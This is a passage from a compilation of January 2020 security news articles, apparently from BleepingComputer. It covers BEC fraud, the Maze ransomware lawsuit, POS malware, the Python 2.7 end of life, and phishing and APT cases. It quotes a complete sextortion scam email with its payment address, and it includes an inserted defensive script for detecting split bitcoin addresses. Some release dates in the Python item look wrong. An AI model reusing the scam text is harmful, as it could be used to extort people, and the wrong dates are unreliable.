In 2018, a hacker group attempted to hack Banco de Chile's systems to obtain the bank's access credentials for the SWIFT network. They deployed the KillDisk wiper in the attack to destroy data and take down roughly 9,000 computers and 500 servers. This allowed them to mislead security teams while they got away with around $10 million.
Also in 2018, yet another wiper called Olympic Destroyer was used to attack the Pyeongchang 2018 Winter Olympics' computer systems.
Tonight's elimination of Qasem Soleimani might bring some retaliation from Iran, especially from the Revolutionary Guard. As a reminder here are a few cyber operations previously conducted by Iran: Shamoon, Ababil, SamSam and many others. Watch your logs. pic.twitter.com/A2x9MqmtLM

— Omri Segev Moyal (@GelosSnake) January 3, 2020
Krebs suggested the following CISA bulletins to those who want to learn more about how to effectively protect against such attacks:

Brute Force Attacks Conducted by Cyber Actors
Avoiding Social Engineering and Phishing Attacks
Protecting Against Ransomware
Recovering from Viruses, Worms, and Trojan Horses
For those only interested in the best way to defend against a wiper malware attack: as with a ransomware infection, having a working backup of all the data is the surest way to get back up and running.

With a secure and safe backup, even if attackers are able to gain access to your network or computers and wipe data, you can simply and quickly restore all the data.

CISA Statement on Iranian Cybersecurity Threats

"Iran has leveraged wiper malware in destructive attacks on several occasions in recent years," John Hultquist, FireEye Director of Intelligence Analysis adds. "Though, for the most part, these incidents did not affect the most sensitive industrial control systems, they did result in serious disruptions to operations.

We are concerned that attempts by Iranian actors to gain access to industrial control system software providers could be leveraged to gain widespread access to critical infrastructure simultaneously. In the past, subverting the supply chain has been the means to prolific deployment of destructive malware by Russian and North Korean actors."

"We are already seeing Iranian disinformation efforts by these networks surrounding last night’s strike, and the U.S. should expect that Iranian influence efforts surrounding the U.S. will increase over the coming days or weeks as political developments evolve," Lee Foster, FireEye Intelligence Information Operations Analysis Senior Manager, also explains.


Colorado Town Wires Over $1 Million to BEC Scammers
6.1.2020 
Bleepingcomputer  Spam

The Colorado town of Erie lost more than $1 million to a business email compromise (BEC) scam that ended with the town's employees sending the funds to a bank account controlled by scammers.

BEC (also known as Email Account Compromise) is a type of financial fraud in which crooks, through computer intrusion or social engineering, deceive an organization's employees into wiring funds to attacker-controlled bank accounts.

The fraudsters used an electronic form on the town's website to request a change to the payment information on the construction contract for the Erie Parkway Bridge, awarded to SEMA Construction in October 2018.

"Specifically, the change was to receive payments via electronic funds transfer rather than by check," Erie Town Administrator Malcolm Fleming said in an email memo according to The Denver Post.

"Although town staff checked some of the information on the form for accuracy, they did not verify the authenticity of the submission with SEMA Construction; they accepted the form and updated the payment method."

Scammers get the money, Erie employee resigns
Erie staff are supposed to follow guidelines designed to verify the authenticity of payment information change requests, but in this case the staff member failed to do so.

As a result, the payment information used to wire roughly $1.01 million to SEMA on October 25, 2019, pointed to the attackers' accounts.

"Once the payments were in that account, the perpetrators of this fraud sent the money via wire transfer out of the country," Fleming added in his email memo.

The fraud was confirmed on November 5, when the bank alerted Erie staff to a possible fraud attempt and SEMA told staff that the payment method change had not been requested from their end.

SEMA was later paid on November 15 for the Erie Parkway Bridge project completion using physical checks, the initial payment method the contractor chose at the beginning of the contract.

The town is actively using other information gleaned from the investigations to identify potential risk and to mitigate those risks. - Malcolm Fleming

Following the incident, the Town of Erie first removed the contact form from the website and temporarily discontinued electronic payments. Finance manager and accounting manager positions were also added to the staffing plan to provide additional oversight of future financial operations.

"The town has filled the risk manager’s position and is actively recruiting for the accounting and finance manager positions," Fleming explained.

"These additional positions will provide additional support, oversight, segregation of duties and management of the town’s financial operations, which have expanded significantly in magnitude and complexity as the town has grown in population."

The Town of Erie staff, the town's police department and the Federal Bureau of Investigation are investigating the incident. The town is also currently working on recovering the funds lost to the BEC scammers.

BleepingComputer has reached out to the Town of Erie for comment, but had not heard back at the time of this publication. This article will be updated when a response is received.

BEC scams are big
BEC victims lost more than $1.2 billion in 2018, according to the Internet Crime Report published by the FBI's Internet Crime Complaint Center (IC3).

The Financial Crimes Enforcement Network (FinCEN) issued its own report saying that BEC suspicious activity report (SAR) filings increased from a $110 million monthly average in 2016 to more than $301 million monthly in 2018.

More recently, the FBI said in a BEC public service announcement from September 2019 that victim complaints with a total exposed dollar loss of more than $26 billion and related to 166,349 incidents were received from June 2016 to July 2019.

While hard to believe at first, these figures are backed by recently reported incidents, such as Nikkei, one of the world's largest media organizations, reporting in October a BEC scam that cost it roughly $29 million.

In early September, a member of the Toyota Group also announced that it had fallen victim to the same type of fraud, with an expected financial loss of more than $37 million.


Maze Ransomware Sued for Publishing Victim's Stolen Data
6.1.2020 
Bleepingcomputer  Ransomware

The anonymous operators behind the Maze Ransomware are being sued by a victim for illegally accessing their network, stealing data, encrypting computers, and publishing the stolen data after a ransom was not paid.

The company suing Maze is Southwire, a leading wire and cable manufacturer from Carrollton, Georgia, which was attacked in December 2019. As part of this attack, the Maze operators allegedly stole 120GB of data and encrypted 878 devices.

After a ransom of 850 bitcoins, or $6 million, was not paid by Southwire, the Maze operators published a portion of the stolen data on a "news" site that the threat actors created.

Southwire Data Published by Maze
The site is hosted at an ISP in Ireland that Southwire says it contacted repeatedly without receiving a response.

Southwire sues Maze operators
On December 31st, 2019, Southwire filed a lawsuit in the Northern District of Georgia, USA against the Maze operators and sought injunctions against a hosting provider in Ireland for hosting the Maze news site and stolen files.

In a civil action against "John Doe", Southwire is requesting injunctive relief and damages against the Maze operators for the encryption of their network and the publishing of stolen data retrieved during the ransomware attack.

"This is a civil action for injunctive relief and damages against Defendant arising under the Computer Fraud and Abuse Act, 18 U.S.C. § 1030, and the common law of trespass to chattels. As further alleged below, Defendant wrongfully accessed Southwire’s computer systems and extracted Southwire’s confidential business information and other sensitive information from the computer systems. Defendant then demanded several million dollars to keep the information private, but after Southwire refused Defendant’s extortion, Defendant wrongfully posted part of Southwire’s confidential information on a publicly-accessible website that Defendant controls."

While it may appear strange to file a lawsuit against the Maze operators, several lawyers that BleepingComputer spoke to stated it may be to reserve their spot for monetary damages in the event that money is recovered by the government. This action could also be used to provide injunctive relief against any U.S. based hosting provider or organization that publishes the data stolen by Maze.

"Title 18, United States Code, Section 1030(g) provides that “any person who suffers damage or loss by reason of a violation of this security may maintain a civil action against the violator to obtain compensatory damages and injunctive relief or other equitable relief.” Under 18 U.S.C. § 1030(g), (a)(2)(C), and (c)(4)(A)(i)(I), a civil action may be brought if the conduct involves a loss during any one-year period aggregating at least $5,000 in value.

Defendant violated the Computer Fraud and Abuse Act, 18 U.S.C. § 1030(a)(2)(C), by knowingly and intentionally accessing Southwire’s protected computers without authorization or in excess of any authorization and thereby obtaining information from the protected computers in a transaction involving an interstate or foreign communication."

As part of the lawsuit, two exhibits were included: one of the ransom note and a redacted image, most likely of the stolen data or the Maze news site.

Exhibit 1
Southwire seeks injunctive relief in Ireland
In a related action, counsel for Southwire requested injunctive relief from the courts of Ireland against the company hosting the Maze news site and the stolen files.

According to TheJournal.ie, Southwire made repeated demands to the web hosting company named World Hosting Farm Limited, which hosts the Maze news site, to remove the stolen data, but never received a response.

Due to this, the company sought injunctive relief against the involved parties.

"The injunction requires the defendants to remove all data relating to Southwire and its customers from the website," TheJournal.ie reported. "The order also compels the defendants to hand up all data taken from Southwire, and that no further material taken from the US firm be published on the internet or anywhere else."

The temporary injunction was granted in part, but the court did not prohibit the media from mentioning the victim's name as part of their reporting.

Since then, BleepingComputer can confirm that the Maze news site has been taken down by the hosting company and is no longer accessible.

It is not known if the Maze team will attempt to host their news site with another hosting provider or move it to Tor where it will be much harder to take down.

The lawsuit could also be a risky move for Southwire, as it could lead to the Maze operators releasing all of the stolen data rather than just a few files.

"This is a bold but risky move by Southwire. It could push the Maze Group into releasing all of the company’s data while the website takedown could result in a game of whack-a-mole in which the data is published in other, possibly more visible, locations,” Emsisoft threat analyst Brett Callow told BleepingComputer via an email conversation.

With the Maze operators being very public about their operations and their willingness to publish stolen data, this move could well lead to more data being exposed.

BleepingComputer has contacted the lawyers for Southwire with questions regarding the lawsuit, but has not heard back at this time.

Update 1/3/2020:

On the same day as the courts in Ireland issued an injunction, the Maze news site was taken down.

In response to our queries, we received the following statement from Artur Grabowski, the CEO of World Hosting Farm LTD, about their shutting down of the Maze "news" site that was hosted at his company.

"At 22.12.2019 IP 185.234.219.190 was banned and no longer visible.

After 24h, owner of this IP asked for enable IP and said he will remove all data. After 48h, data was not removed, but due to holidays, we didn't check that. One of administrators has blocked IP and server again at 31.12.2019

Disk has been secured for police if needed."


Python 2.7 Reaches End of Life After 20 Years of Development
6.1.2020 
Bleepingcomputer  IT

As of January 1st, 2020, Python 2.7 has officially reached the end of life and will no longer receive security updates, bug fixes, or other improvements going forward.

Released in 2000, Python 2.7 has been used by developers, administrators, and security professionals for 20 years. While Python 3 was released in 2006, due to the number of users continuing to use 2.7, the Python team decided to support both development branches.

Python 2.7 was originally slated to be retired in 2015, but the development team pushed its sunset to 2020.

To focus on Python 3 and increase the speed of its development and bug fixes, the development team has now sunset Python 2.7 and the team recommends that all users upgrade to Python 3 to continue receiving important updates.

"We are volunteers who make and take care of the Python programming language. We have decided that January 1, 2020, will be the day that we sunset Python 2. That means that we will not improve it anymore after that day, even if someone finds a security problem in it. You should upgrade to Python 3 as soon as you can."

The Python team does plan to release one more version of Python 2.7 in April 2020, which will be its final release. This release will include bug and security fixes developed in 2019, and possibly later ones as determined by the release manager, to ensure the stability of the final release.

Those who require Python 2.7 and do not wish to upgrade their scripts or applications can switch to PyPy, which will continue to support Python 2.7 after 2020. Even so, compatibility may suffer as third-party developers update their libraries to support Python 3.

Linux distributions and the sunset of Python 2.7
As Python 2.7 reaches the end of life, Linux distributions are also changing how they will continue to support the legacy version of Python.

Most of the distributions are following the same practice of adding upgraded packages for dependencies and libraries that support Python 3.x with the eventual goal of switching to Python 3 as the default version.

This process will take quite some time, so Python 2.7 will continue to be offered.

Red Hat
Red Hat has stated that even though the Python Software Foundation (PSF) has retired Python 2.7, they will continue to support it through the normal RHEL lifecycle.

"Just because the PSF consider Python 2 "unsupported" does not mean that Python 2 is "unsupported" within RHEL."

For Red Hat Enterprise Linux 8, the Python 2.7 package will be supported until June 2024. After this date, Red Hat will recommend that users upgrade to Python 3, but customers may continue to use 2.7 in a self-supported manner.

"After this date, customers are encouraged to upgrade to a later Python release such as Python 3. Customers may also continue with Python 2.7 as self-supported without official Red Hat Support."

Debian and Ubuntu
Both Debian and Ubuntu have started updating Python 2 libraries to their Python 3 equivalents in the preparation of the sunset of Python 2.7.

As of Debian Buster (10.x) and Ubuntu 18.04 LTS, Python 3 is the default version, but Python 2.7 is still available for those wishing to install it.

Fedora
Like the other distributions, Fedora has been updating Python 2 packages to the Python 3 equivalents.

In the current release, Fedora 31, Python 3.6 is the default version installed.

Fedora with Python 3.7 as default
Python 2.7 is still available as an installable package.

Kali Linux
Like Ubuntu, Kali Linux is following Debian's lead and has begun adding support for packages upgraded to Python 3.

Once all packages and dependencies are upgraded to Python 3, Kali will eventually remove Python 2.x.


Poloniex Forces Password Reset After Data Leak Found Online
6.1.2020 
Bleepingcomputer  Incindent

The Poloniex cryptocurrency trading platform has reset some of its users' passwords after a list of alleged username and password combinations was found circulating on Twitter.

On December 30th, 2019, users began receiving an email from Poloniex stating that their user name and password for the trading site may have been included in a data leak circulating on Twitter.

Tweet from @charlysatoshi
This email went on to say that some of the email addresses in the leak did not contain legitimate Poloniex accounts, but to be safe the trading platform is forcing a password reset on any email addresses that do have an account with them.

"A couple of hours ago we discovered that someone leaked a list of email addresses and passwords on Twitter, claiming the information could be used to log in to Poloniex accounts. While almost all of the email addresses listed do not belong to Poloniex accounts, we are forcing a password reset on any email addresses listed that do not have an account with us, including yours."

Due to the lack of information in the email, some users were unsure whether it was a scam or genuinely from Poloniex.

Soon after, the official support account for Poloniex on Twitter tweeted that the email was legitimate and that users should reset their passwords.

Poloniex confirms the email is real
It is not known how this list of accounts was created, but it could have been compiled via credential stuffing attacks using accounts leaked in other data breaches.

Unfortunately, as Poloniex themselves do not know the source of the data, BleepingComputer suggests that all Poloniex users reset their passwords to be safe.

Change passwords to prevent credential stuffing attacks
If you received this email from Poloniex and you use the same username and password at other sites, BleepingComputer strongly suggests that you change your password at these other sites as well to prevent credential stuffing attacks.

A credential stuffing attack is when attackers compile usernames and passwords leaked in different companies' data breaches and use those credentials to try to gain access to accounts at other sites. This type of attack works particularly well against users who use the same password at every site.

To avoid having your credentials used in this type of attack, be sure to use a unique password at every site that you visit. To make it easier to keep track of strong and unique passwords, a password manager is highly recommended.


Popular U.S. Restaurant Owner Hit by Credit Card Stealing Malware
6.1.2020 
Bleepingcomputer  Virus

Landry's, a U.S. restaurant chain and property owner, has disclosed that it was infected with point-of-sale (POS) malware that allowed attackers to steal customers' credit card information.

Landry's owns and operates over 600 restaurants, with 60 well-known brands such as Landry's Seafood, Chart House, Saltgrass Steak House, Bubba Gump Shrimp Co., Claim Jumper, Morton's The Steakhouse, McCormick & Schmick's, Mastro's Restaurant, Rainforest Cafe, Del Frisco's Grill, and many more.

In a "Notice of Data Breach", Landry's has disclosed that an unauthorized user was detected on their systems and after completing an investigation it was discovered that POS malware was present on their systems between March 13, 2019, and October 17, 2019. At some locations, the malware may have been installed as early as January 18, 2019.

This POS malware could have been used under "rare circumstances" to steal customers' credit card information, including cardholder name, card number, expiration date, and internal verification code.

"We are notifying customers of an incident that we recently identified and addressed involving payment cards that, in rare circumstances, appear to have been mistakenly swiped by waitstaff on devices used to enter kitchen and bar orders, which are different devices than the point-of-sale terminals used for payment processing. This notice explains the incident, measures we have taken, and some steps you can take in response."

In 2016, Landry's implemented end-to-end encryption payment systems in all owned locations. Any cards swiped using devices on this end-to-end encryption system would not have been stolen by the POS malware.

Similar to an incident at Catch Restaurant, the locations owned by Landry's also have order-entry systems with attached card readers that do not use encryption. If waitstaff mistakenly used one of these systems to process a credit card payment, the POS malware would have been able to steal the payment information and send it to the attackers.

This data breach could be the largest affecting the restaurant industry that we have seen this past year, not only due to the number of locations, but also due to the clientele.

Some of the restaurant properties owned by Landry's, such as Morton's, Del Frisco's, and Mastro's, are very popular with business crowds and are very expensive. This could have allowed attackers to gain access to corporate credit cards with very high limits.

Anyone who has dined at these restaurants between January 18, 2019, and October 17, 2019, should contact their credit card company and let them know what has happened.

Customers should also monitor their credit card statements for fraudulent or suspicious charges and immediately dispute them if they are not recognized.


Ransomware Attackers Offer Holiday Discounts and Greetings
6.1.2020 
Bleepingcomputer  Ransomware

To celebrate the holidays, ransomware operators are providing discounts or season's greetings to entice victims into paying a ransom demand.

As ransomware operators look at their organizations as a business, it is not surprising to see them offering discounts or season's greetings to their victims.

Such is the case with the Sodinokibi (REvil) Ransomware, whose ransom note MalwareHunterTeam noticed had been changed over the holidays to include a new message wishing the victims a "Merry Christmas and Happy Holidays".

REvil Holiday Ransom Note
The REvil ransom note goes on to suggest that instead of being stressed over the holidays, victims should pay the ransom so that they "have a great opportunity to enter the new year, leaving all the bad in the outgoing year. I advise you to write to us as soon as possible and not waste your precious time that you can spend with your family."

I am not sure this will have much effect on getting a victim to pay, but it does add a psychological impact to those who have to deal with them during the holidays.

Maze offered a holiday discount
The Maze operators took it a step further with their holiday celebrations by offering a discount to victims.

In a message to BleepingComputer, the Maze operators stated that they were offering a 25% discount if victims paid between December 25th and December 31st.

"We give 25% discount from 25-th december til 31-th December (included) for those who pays in this period of time. Merry christmas."

It is not known whether this discount was applied retroactively to all of their victims, or whether victims were told about it via the chat service or some other means.

As part of a "new year celebration", the Maze operators have also told BleepingComputer that they are discounting the City of Pensacola's ransom to $500,000 and will no longer share their documents.

"Due to the upcoming new year celebration, we decided not to publish the Pensacola city private information and delete their data completely from our servers, but the article will remain on our news site. We are making a discount of 500 000 USD for them, after the payment, we will remove the article from our news site and give them decryptors," the Maze operators told BleepingComputer.

It is BleepingComputer's understanding that the City has no intention of paying the ransom.

Don't pay, but if you have to, always negotiate
The general rule is that ransomware victims should never pay a ransom as it only encourages this type of criminal behavior. Instead, users should restore files through backups or by recreating the data.

At the same time, recovering data may not always be an option, and some businesses are forced to make a ransom payment.

While the holidays have come and gone, if you decide to pay the ransom, make sure to negotiate with the ransomware operators as almost all of them are known to accept lower payments than initially demanded.

If you do not feel comfortable negotiating the payment yourself, you can use a trusted ransomware negotiation service like Coveware to handle this for you.


Starbucks Devs Leave API Key in GitHub Public Repo
1.1.2020 
Bleepingcomputer  Security

A misstep by Starbucks developers exposed an API key that could be used by an attacker to access internal systems and manipulate the list of authorized users.

The severity rating of the vulnerability was set to critical as the key allowed access to a Starbucks JumpCloud API.

Serious impact
Vulnerability hunter Vinoth Kumar found the key in a public GitHub repository and disclosed it responsibly through the HackerOne vulnerability coordination and bug bounty platform.

JumpCloud is an Active Directory management platform billed as an Azure AD alternative. It provides user management, web app single sign-on (SSO) access control, and Lightweight Directory Access Protocol (LDAP) service.

Kumar reported the oversight on October 17, and close to three weeks later Starbucks responded that the report demonstrated "significant information disclosure" and qualified for a bug bounty.

Starbucks took care of the problem much sooner, though: Kumar noted on October 21 that the repository had been removed and the API key revoked.

The company took longer to respond because it needed "to make sure we understand the severity of the issue and that all appropriate remediation steps have been taken."

Along with identifying the GitHub repository and specifying the file hosting the API key, Kumar also provided proof-of-concept (PoC) code demonstrating what an attacker could do with the key.

Apart from listing systems and users, adversaries could also take control of the Amazon Web Services (AWS) account, execute commands on systems, and add or remove users with access to the internal systems.

Paying the bounties
Once Starbucks was content with the remediation steps taken, the company paid Kumar a $4,000 bounty for the disclosure, which is the maximum reward for critical vulnerabilities. Most bounties from Starbucks are between $250 and $375.

The company has resolved 834 reports since launching the bug bounty program in 2016, 369 of them in the past three months. Starbucks has spent $40,000 on them.

Another significant vulnerability reported to Starbucks this year is an oversight that could be leveraged to take control of a company subdomain. The issue was that a subdomain pointed to an Azure cloud host that had been abandoned. Starbucks paid $2,000 for the report.


Sextortion Email Scammers Try New Tactics to Bypass Spam Filters
1.1.2020 
Bleepingcomputer  Spam

Sextortion scammers have started to utilize new tactics to bypass spam filters and secure email gateways so that their scam emails are delivered to their intended recipients.

Sextortion scams are emails that pretend to be from an attacker who has hacked your PC and installed malware that can monitor what sites you visit and create videos using your webcam.

These emails go on to state that the attacker has created a video of you watching adult websites and will send it to all of your contacts unless you pay an extortion demand.

Sextortion scams have become so common that spam filters and secure mail gateways have been doing a good job of preventing them from being delivered to their recipients.

Using new evasion tactics
To bypass these filters, attackers have started to utilize new tactics such as sending sextortion emails in foreign languages and splitting bitcoin addresses into two parts.

This is illustrated in a new sextortion email shared with BleepingComputer, where the scammers are sending these emails to English-speaking users but with the content written in Russian.

As can be seen in the email below, the only text in English is the instructions to "Use google translator."

Sextortion Email
The text in the email is Russian as shown below.

Use google translator.

В последний раз Вы посетили порнографический веб-сайт с молодыми подростками, вы загрузили и установили автоматически шпионишь программное обеспечение, которое я создал. Моя программа включила вашу камеру и записала акт вашего возмущения и видео, которое вы наблюдали во время возмущения. Я также получил ваши списки контактов, номера телефонов, электронные письма, контакты в социальных сетях. У меня есть видео файл g_c.mp4 с ur mαsturbatioɳ и файл со всеми вашими контактами на моем жестком диске. Если вы хотите, чтобы я удалил оба файла и сохранил ваш секрет, вы должны передать мне биткойн-агент. Я даю вам 72 часа, чтобы перечислить средства.
Сумма: 0,14 бит-монеты (приблизительно)
Часть 1 бит-монеты: 3Bv9QgEw15QQo1T
Часть 2 бит-адреса: EUVW4hbBkkd2fEtFfPP
Важно: Вы должны соединить две части (часть 1 адреса бит-монета + часть 2 адреса бит-монеты) без пробелов между ними. Вы также можете сохранить это где-то, чтобы не потерять детали.
Быстрая подсказка! Вы можете купить Bit-Coin от Paxful. Используйте Google, чтобы найти его.
В следующий раз, когда вы закроете свои камеры, кто-нибудь может посмотреть это! Ограничьте себя один раз в месяц, если вы не можете полностью перейти на NoFap.
When translated to English with Google Translate, the email turns out to contain the typical sextortion scam described earlier in the article.

The last time you visited a pornographic website with young teens, you downloaded and installed automatically spy software that I created. My program turned on your camera and recorded the act of your indignation and the video that you observed during the indignation. I also received your contact lists, phone numbers, emails, contacts on social networks. I have a video file g_c.mp4 with ur mαsturbatioɳ and a file with all your contacts on my hard drive. If you want me to delete both files and keep your secret, you must pass me the bitcoin agent. I give you 72 hours to transfer funds.
Amount: 0.14 bit coins (approximately)

Part 1 Bit Coins: 3Bv9QgEw15QQo1T
Part 2 bit addresses: EUVW4hbBkkd2fEtFfPP

Important: You must connect the two parts (part 1 of the bit-coin address + part 2 of the address of the bit-coin) without spaces between them. You can also save this somewhere so as not to lose the details.

Quick tip! You can buy Bit-Coin from Paxful. Use Google to find it.
The next time you close your cameras, someone can watch this! Limit yourself once a month if you cannot completely switch to NoFap.
In addition to using a foreign language when targeting English-speaking users, the scammers also break the bitcoin address into two parts. They then provide instructions to combine the two parts into the actual bitcoin address to which the extortion payment should be sent.

In this case, the resulting bitcoin address is 3Bv9QgEw15QQo1TEUVW4hbBkkd2fEtFfPP, which does not currently have any payments sent to it.
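Because the two halves above only become a real address once joined, a filter that pattern-matches whole 26- to 35-character Base58 strings misses this message. The following added example (not from the original article) scans a message for Base58 fragments, joins adjacent pairs, and checks the result against the Base58Check checksum that every legacy Bitcoin address carries, so a gateway can tell an address split for evasion from two unrelated tokens. The sample message is constructed from the two fragments quoted above; the fragment-length threshold of 10 characters is an assumption.

```python
import hashlib
import re

# Bitcoin's Base58 alphabet: no 0, O, I or l.
B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"

# A fragment is a run of 10+ Base58 characters. The threshold is an assumption:
# long enough to skip ordinary words, short enough to catch a split half.
FRAGMENT_RE = re.compile(r"\b[1-9A-HJ-NP-Za-km-z]{10,35}\b")


def b58decode(s: str) -> bytes:
    """Decode Base58, restoring leading zero bytes (encoded as leading '1's)."""
    n = 0
    for ch in s:
        n = n * 58 + B58.index(ch)  # ValueError on a non-Base58 character
    pad = len(s) - len(s.lstrip("1"))
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    return b"\x00" * pad + body


def is_valid_btc_address(s: str) -> bool:
    """Base58Check for legacy addresses: 25 bytes = version(1) + hash160(20) + checksum(4),
    where checksum = SHA256(SHA256(version + hash160))[:4].
    Covers P2PKH ('1...') and P2SH ('3...'); bech32 'bc1...' uses a different scheme."""
    if not s or s[0] not in "13":
        return False
    try:
        raw = b58decode(s)
    except ValueError:
        return False
    if len(raw) != 25:
        return False
    payload, checksum = raw[:21], raw[21:]
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4] == checksum


def find_addresses(text: str):
    """Return (whole, reassembled).

    whole: fragments that already validate as an address.
    reassembled: (combined, checksum_ok) for each adjacent fragment pair whose
    concatenation has address length and a legacy version prefix."""
    frags = FRAGMENT_RE.findall(text)
    whole = [f for f in frags if is_valid_btc_address(f)]
    reassembled = []
    for a, b in zip(frags, frags[1:]):
        combined = a + b
        if 26 <= len(combined) <= 35 and combined[0] in "13":
            reassembled.append((combined, is_valid_btc_address(combined)))
    return whole, reassembled


# Constructed sample message built from the two fragments quoted in the article.
SAMPLE = """Amount: 0.14 bitcoins (approximately)
Part 1: 3Bv9QgEw15QQo1T
Part 2: EUVW4hbBkkd2fEtFfPP
Join both parts without spaces."""

if __name__ == "__main__":
    whole, reassembled = find_addresses(SAMPLE)
    print("whole addresses:", whole)
    for combined, ok in reassembled:
        print(f"reassembled {combined}: checksum {'ok' if ok else 'FAILED'}")
```

Run stand-alone, the script reports whether the reassembled string passes the checksum. A gateway rule would quarantine on a pass: two unrelated tokens clearing the 32-bit check by accident is roughly a one-in-four-billion event, so a pass is strong evidence that the sender deliberately split a payment address.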

Taken together, these two tactics also make it more difficult for the recipient to understand what they are receiving.

The attackers, though, are betting that the gain in evasion outweighs the extra effort the recipient must put into translating the message.

As always, if you receive a sextortion email, you have nothing to worry about.

The scammers did not hack your computer or install malware that records you while on adult sites, and you should not send any payment to the enclosed bitcoin address.

Instead, mark the email as spam so that the filters can learn from these new tactics and detect them in the future.


How to Join the Windows Insider Program with a Local Account
1.1.2020 
Bleepingcomputer  OS

The Microsoft Windows Insider program allows consumers and professionals to preview the upcoming features of Windows 10 before they are shipped to consumers.

To join the program and install preview builds, you normally need a PC running Windows 10 that is linked to a Microsoft account; without that link, Insider preview builds are not offered for download and installation.

An independent developer has now created a command-line script called 'Offline Insider Enroll' that allows Windows 10 PCs to enroll in the Insider program without a Microsoft account.

On GitHub, the developer explained that the script takes advantage of the 'TestFlags' registry value to enroll a user in the program:

If this value is set to '0x20', all access to online Windows Insider services gets disabled. Because of this, we can set our own Windows Insider Preview configuration without being overridden by the contact to the service. Since Windows Update does not check if the machine is actually enrolled in the program, you will get offered Insider Preview builds by just setting the correct values in the registry.

The process is fairly easy to set up and takes place entirely in the Command Prompt as described below.

Install Windows 10 preview builds without a Microsoft account
Download the 'Offline Insider Enroll' script from the GitHub repository and save it anywhere in the local system.
Extract the archive to view the script.
To run the script, right-click on the file and select 'Run as administrator'.
After the script is executed, it will ask you to select the Ring to join. More information about the various Rings can be found here.
Script

After selecting a Ring to join, you will be prompted to reboot your computer, which you should do.
After rebooting the system, you can go into the Windows Insider Program control panel and see that you have now joined the selected ring.

Offline Windows Insider
To stop receiving Windows Insider builds, you can run the script again, but this time select X and then reboot the computer.


Special Olympics New York Hacked to Send Phishing Emails
1.1.2020 
Bleepingcomputer  Phishing

Special Olympics of New York, a nonprofit organization focused on competitive athletes with intellectual disabilities, had its email server hacked around this year's Christmas holiday and later used to launch a phishing campaign against previous donors.

Special Olympics NY provides sports training and athletic competition to more than 67,000 children and adults with intellectual disabilities across New York State (66,835 registered athletes and unified partners according to this fact sheet).

The nonprofit sent a notification disclosing the security incident to the people affected, urging donors to disregard the last message they received and explaining that the hack only affected the "communications system," which stores contact information and no financial data.

"As you may have noticed, our email server was temporarily hacked. We have fixed the problem and send our sincerest apologies," an email notification from Special Olympics New York told donors.

Security incident notification
Security incident notification (Image: Bleeping Computer)
"The hack was to our communications system, which only includes your contact information and not any financial data," the notification stated. "Please be assured that your contact information is protected and has been kept confidential."

Phishing for credentials
The phishing emails delivered by the attackers were camouflaged as an alert about an impending donation transaction that would automatically debit $1,942.49 from the target's account within two hours.

Using such a short time frame allowed the phishers to induce a sense of urgency designed to make the Special Olympics NY donors click on one of the two embedded hyperlinks, links that would supposedly redirect them to a PDF version of the transaction statement.

"Please review and confirm that all is correct, if you have any questions, please find my office ext number in the statement and call me back," the phishing emails said. "It is not a mistake, i verified all twice. Thank you, have a great weekend."

The phishing email utilized a Constant Contact tracking URL that redirected to the attackers' landing page. This page has since been taken down but was most likely used to steal donors' credit card details.

Phishing email sample
Phishing email sample (Image: Bleeping Computer)
In a statement, SVP of External Relations for Special Olympics NY Casey Vattimo said that donors can now make donations securely as the issue has now been fixed.

Additionally, all amounts donated to Special Olympics NY through December 31 will be tripled courtesy of Finish Line. If you wish to, you can donate by going to this donation page.

Olympics staff targeted in cyber-attacks
In related news, Tokyo 2020 Summer Olympics staff also issued a warning about a phishing campaign that delivered emails designed to look like they came from the Tokyo Organizing Committee of the Olympic and Paralympic Games (Tokyo 2020).

They also said that the malicious emails most likely redirected the recipients to landing phishing sites or infected the victims' computers with malware if opened.

Last year, in February 2018, destructive malware dubbed Olympic Destroyer was used to sabotage systems of the Pyeongchang 2018 Winter Olympics as part of a coordinated attack that led to IT problems during the opening ceremony, such as failing Internet and television systems.

Two weeks before the Pyeongchang incident, McAfee researchers had also released a report on a PowerShell-based malware strain used to target the same Olympics organizers right before the event's start.


Microsoft Takes North Korean Hacking Group Thallium to Court
1.1.2020 
Bleepingcomputer  APT

Microsoft sued a cyber-espionage group with North Korean links tracked as Thallium for breaking into its customers' accounts and networks via spear-phishing attacks with the end goal of stealing sensitive information, as shown by a complaint unsealed on December 27.

"To manage and direct Thallium, Defendants have established and operate a network of websites, domains, and computers on the Internet, which they use to target their victims, compromise their online accounts, infect their computing devices, compromise the security of their networks, and steal sensitive information from them," Microsoft's complaint says.

The lawsuit was filed by Microsoft on December 18 in the U.S. District Court for the Eastern District of Virginia, as first reported by Bloomberg Law's Blake Brittain.

The precise identities and locations of those behind the activity are generally unknown but have been linked by many in the security community to North Korean hacking group or groups. - Microsoft

According to Microsoft, Thallium targets both public and private industry targets and it has been observed while previously attacking "government employees, organizations and individuals that work on Nuclear Proliferation issues, think tanks, university staff members, members of organizations that attempt to maintain world peace, human rights organizations, as well as many other organizations and individuals."

According to Redmond's complaint, the North Korean hackers are believed to have been active since at least 2010 and are known for spear-phishing attacks operated via legitimate services such as Gmail, Yahoo, and Hotmail.

A list of 50 domains used by Thallium in their attacks and taken down by Microsoft on a court order is available in Appendix A of the complaint.

"Our court case against Thallium, filed in the U.S. District Court for the Eastern District of Virginia, resulted in a court order enabling Microsoft to take control of 50 domains that the group uses to conduct its operations," said Tom Burt, Microsoft's Corporate Vice President of Customer Security & Trust, in a blog post after this article was published.

"With this action, the sites can no longer be used to execute attacks," Burt added.

Behind the STOLEN PENCIL APT campaign
Netscout's ATLAS Security Engineering & Response Team (ASERT) also tracks one of the North Korean hacking group's campaigns as STOLEN PENCIL.

According to Netscout, the hackers' STOLEN PENCIL APT campaign has been targeting academic institutions since at least May 2018 in spear-phishing attacks with the end goal of stealing credentials.

Based on several shared resources, Palo Alto Networks' Unit42 also linked Thallium's STOLEN PENCIL campaign with a malware dubbed BabyShark, delivered as part of a spear-phishing campaign focused "on gathering intelligence related to Northeast Asia's national security issues" starting in November 2018.

"Well-crafted spear phishing emails and decoys suggest that the threat actor is well aware of the targets, and also closely monitors related community events to gather the latest intelligence," Unit42 said.

"While not conclusive, we suspect that the threat actor behind BabyShark is likely connected to the same actor who used the KimJongRAT malware family, and at least shares resources with the threat actor responsible for the STOLEN PENCIL campaign."

